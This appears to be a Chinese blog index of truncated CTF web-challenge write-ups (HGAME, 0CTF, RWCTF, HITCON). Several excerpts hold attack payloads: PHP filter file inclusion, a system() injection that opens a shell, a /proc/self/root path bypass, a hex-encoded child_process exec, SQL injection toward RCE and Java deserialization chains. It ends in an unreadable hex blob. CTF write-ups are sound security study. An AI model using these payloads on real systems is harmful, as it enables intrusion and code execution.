TEL

最后一题想到一个非预期，嗯~~~非预期没做出来 MyDoor任意文件包含 php://filter/read=convert.base64-encode/resource=index.php 然后传参 N[S.S=system("ls");&file= 弹 shell，然后找到 藏 flag 的地方 MyPage和 MyDoor 差不多，这里使用脏数据绕过 1php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/ ...

Week 1Classic Childhood Game翻 js 代码有一段数据 123var a = [ "\x59\x55\x64\x6b\x61\x47\x4a\x58\x56\x6a\x64\x61\x62\x46\x5a\x31\x59\x6d\x35\x73\x53\x31\x6c\x59\x57\x6d\x68\x6a\x4d\x6b\x35\x35\x59\x56\x68\x43\x4d\x45\x70\x72\x57\x6a\x46\x69\x62\x54\x55\x31\x56\x46\x52\x43\x4d\x46\x6c\x56\x59\x7a\x42\x69\x56\x31\x59\x35",]; 二次 base64 解码后是 flag Become A Member12345678910111213141516GET / HTTP/1.1Host: week-1.hgame.lwsec.cn:32174Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Cut ...

https://ctf.junior.nu1l.com/2023.html 只出了一题 orrs(卑微) template 复现很简单，但是没有猜到弱密码是 root/root ez_zudit 需要审计出一个 EL 表达式注入 can_u_bypass 执行 oracle sql 语句，需要实现 RCE easyjpg 是一道 0day，和 HITCON2022 web2pdf 相似 orrs有 sql 注入漏洞 然而题目要求 RCE 通过 sql 注入漏洞获取到如下信息（然而是没有用处的） database: orrs_db @@secure_file_priv: /var/lib/mysql-files/ @@plugin_dir: /usr/lib/mysql/plugin/ 表名: message_list,reservation_list,schedule_list,system_info,train_list,users 字段 user: Host,User,Select_priv,Insert_priv,Update ...

[TCTF2022]3rm1 hint 1: https://i.blackhat.com/eu-19/Wednesday/eu-19-An-Far-Sides-Of-Java-Remote-Protocols.pdf page 50 hint 2: https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Spring1.java 题目给了两个环境，一个 RMIClient，另一个 RMIServer。flag 在 client 中 Dockerfile->jdk 版本 8u201 wp https://xz.aliyun.com/t/11883#toc-4 原题附件: https://github.com/waderwu/My-CTF-Challenges/tree/master/0ctf-2022/3rm1 threermiclient.jar 中 FactoryInter 接口应该继承 Remote，否则这题做不了······ 可是 github 附件里面反编译出 ...

[RWCTF2023]ChatUWU 看到 discord 上别人的聊天，他们各有各的思路: in my case I just set a breakpoint when the user input entered socket.io and just followed it until I saw that nice parse function I dont think that fuzzing is needed for such a small codebase, and as @[Sauercloud] WhoNeedsSleep already said we had an intuition that tricking the bot into connecting to our server would be neccessary. so this line where the url is just passed to socket.io was a good starting point to look for a potential flaw and it ...

[HITCON2022]RCE首先是拿到密钥 123456789101112131415161718192021222324252627282930313233import requestsimport urllibpayload = "7265717569726528276368696c645f70726f6365737327292e6578656328276c73202f2729" # require('child_process').exec('ls /')payload = "7265712e7365637265743d224c316e4c316e4c22" # {"progress":40,"result":"Executing 'req.secret=\"L1nL1nL\"', result = L1nL1nL"}payload = "7265712e73656372 ...

Readme测一下参数，发现 buf 里面是伪随机数 当我们传入 1，2，3，后端会进行累加，最后是 6 123{    "orders":[1，2，3]} 但是测试了 100，后端居然直接加了 4096 通过这一段代码，找到我们需要累加到的数字: 12625 123456789101112131415161718192021func justFindIt(w http.ResponseWriter, r *http.Request) { count := 0 for true { count++ reader := bytes.NewReader(randomData) validator := NewValidator() ctx := context.Background() ctx = WithValidatorCtx(ctx, reader, int(count)) _, err := validator.Read(ctx) if err != nil { } if err : ...

[TCTF/0CTF2022]hessian-onlyjdk这题找了很多资料 https://blog.z3ratu1.cn/0CTF2022%E5%A4%8D%E7%8E%B0.html https://siebene.github.io/2022/09/19/0CTF2022-hessian-onlyjdk-WriteUp/ http://miku233.viewofthai.link/2022/10/13/0ctf-hessian-onlyjdk/ https://guokeya.github.io/post/psaIZKtC4/ https://www.cnblogs.com/kingbridge/articles/16717030.html#%E7%AE%80%E5%8D%95%E5%88%86%E6%9E%90 https://xz.aliyun.com/t/11732 首先需要看懂 XStream CVE-2021-21346 链子的由来 https://x-stream.github.io/CVE-2021-21346.html 其次学会网鼎杯那道 hes ...

主要是记录一下，另外还有 CodeQL 题目给了一个 jdbc 连接，总所周知，jdbc 连接 mysql 数据库是会有危险的，而这道题目里面尝试着把 mysql 连接的两个风险点给禁用掉了 12345678910111213141516package com.example.ezjaba.security;/* loaded from: ezjaba.jar:BOOT-INF/classes/com/example/ezjaba/security/JdbcUtils.class */public class JdbcUtils { private static final String JDBC_MYSQL_PROTOCOL = "jdbc:mysql"; private static final String SENSITIVE_PARAM = "autoDeserialize=true"; // 禁用反序列化 private static final String FILE_READ = "allowL ...

dc798e8195ee3863019cbd6c2f5993380ebcbb2497f86b7a6b587e524abbded6fe3b59b2edb2d5ae2ce187c88566d45c1cec43e81ff5e084cb1daeefad589c2027531a355bbff3528d4d4b4a791a301ac3a006dabfff1e97624611a6ee9163298e89e53bc9bb55ca99f1e35b40bef85b8239971852c23707047e6853c553bac679f7695fc2b397ec9756d72dfc453b339f7bdbc9e6106adacb89687cac43bf2e3565845f1073669aa548c6c77aeb825c5b15cf62f90c9df1e8c287cf9e8d2ecda785f327709baed9c52894c810f0f66d11cd06df5a65c3e9cbeec09be44bd446e7898fe3322d31256b8878cd4bff410f400da3c79f043528e ...